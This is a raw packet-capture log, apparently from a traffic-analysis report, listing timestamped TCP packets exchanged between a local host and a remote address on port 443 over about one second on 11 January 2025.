                                                                                                              Jan 11, 2025 04:43:12.447686911 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.447706938 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.454204082 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.454250097 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.454282999 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.454288006 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.454303980 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.454333067 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.458370924 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.458444118 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.458456993 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.458503008 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.464811087 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.464848995 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.464869976 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.464876890 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.464915991 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.464936018 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.471462965 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.471524954 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.471563101 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.471620083 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.477523088 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.477597952 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.477612019 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.477621078 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.477659941 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.483859062 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.483905077 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.483927965 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.483946085 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.483984947 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.484004974 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.487845898 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.487904072 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.488039017 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.488092899 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.492558002 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.492599010 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.492614031 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.492621899 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.492644072 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.492676973 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.731640100 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.731698036 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.735914946 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.735969067 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.735971928 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.735990047 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.736012936 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.736042023 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.742240906 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.742296934 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.742309093 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.742325068 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.742341995 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.746181011 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.748954058 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.749017954 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.749067068 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.749123096 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.755001068 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.755069971 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.755147934 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.755206108 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.761240959 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.761301994 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.761360884 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.761419058 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.765333891 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.765394926 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.765537024 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.765595913 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.770265102 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.770335913 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.770359993 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.770410061 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.774092913 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.774151087 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.774153948 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.774168015 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.774192095 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.774211884 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.778428078 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.778466940 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.778490067 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.778502941 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.778527975 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.778544903 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.782663107 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.782721043 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.782764912 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.782816887 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.793747902 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.793823004 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.793878078 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.794028997 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.798276901 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.798343897 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.798388958 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.798451900 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.804694891 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.804759026 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.804814100 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.804873943 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.814924955 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.814994097 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.815057039 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.815120935 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.818941116 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.819000006 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.819026947 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.819082022 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.823921919 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.823980093 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.824115038 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.824172020 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.828752995 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.828815937 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.828824997 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.828843117 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.828872919 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.828896999 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.834723949 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.834794998 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.834856033 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.834913969 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.841272116 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.841326952 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.841484070 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.841535091 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.847619057 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.847697020 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.847733021 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.847790956 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.853708029 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.853768110 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.853794098 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.853853941 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.857906103 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.857985020 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.858025074 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.858079910 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.862687111 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.862783909 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.862797022 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.862854958 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.866729021 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.866812944 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.867002010 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.867002010 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.867013931 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.870179892 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.870949984 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.871018887 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.871045113 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.871102095 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.875206947 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.875293016 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.875372887 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.875432968 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.886113882 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.886218071 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.886213064 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.886246920 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.886271000 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.886296988 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.892982960 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.893055916 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.893075943 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.893125057 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.897392988 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.897484064 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.897506952 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.897567034 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.907409906 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.907500029 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.907525063 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.907581091 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.911458015 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.911561966 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.911612034 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.911672115 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.916635036 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.916723967 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.916728020 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.916753054 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.916781902 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.916805983 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.920912027 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.920968056 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.920991898 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.921003103 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.921024084 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.921049118 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.927063942 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.927155972 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.927182913 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:12.927247047 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:12.933706045 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.223589897 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.223683119 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.223742008 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.228236914 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.228275061 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.228322029 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.228332043 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.228368998 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.228394985 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.232507944 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.232561111 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.232584000 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.232590914 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.232629061 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.232650995 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.236598969 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.236669064 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.236721039 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.236799955 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.240946054 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.240993977 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.241008997 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.241014957 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.241071939 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.245276928 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.245349884 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.245405912 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.245475054 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.256221056 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.256306887 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.256314993 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.256344080 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.256370068 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.256390095 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.263010025 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.263073921 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.263086081 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.263143063 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.267375946 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.267453909 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.267457962 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.267484903 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.267514944 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.267528057 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.285686970 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.285761118 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.285839081 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.285896063 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.286247015 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.286298990 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.286315918 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.286320925 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.286364079 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.286393881 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.286653042 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.286716938 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.286853075 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.286916018 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.290831089 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.290895939 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.290899992 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.290915966 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.290941000 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.290961027 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.297060013 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.297137976 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.297178984 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.297243118 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.303685904 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.303750038 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.303813934 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.303875923 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.310286045 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.310350895 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.310436010 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.310498953 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.316153049 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.316241026 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.316281080 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.316343069 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.320323944 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.320384026 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.320399046 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.320452929 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.324502945 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.324955940 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.325016022 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.325086117 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.325145006 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.329097033 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.329149961 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.329154015 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.329169989 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.329196930 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.329225063 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.333344936 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.333399057 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.333575964 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.333638906 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.337784052 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.337848902 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.337876081 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.337884903 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.337932110 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.348735094 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.348855019 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.348858118 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.348915100 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.348954916 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.349055052 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.355304956 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.355360985 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.355432034 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.355485916 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.359791994 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.359853029 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.359906912 CET44349870118.178.60.9192.168.2.8
                                                                                                              Jan 11, 2025 04:43:13.359971046 CET49870443192.168.2.8118.178.60.9
                                                                                                              Jan 11, 2025 04:43:13.363559008 CET49870443192.168.2.8118.178.60.9
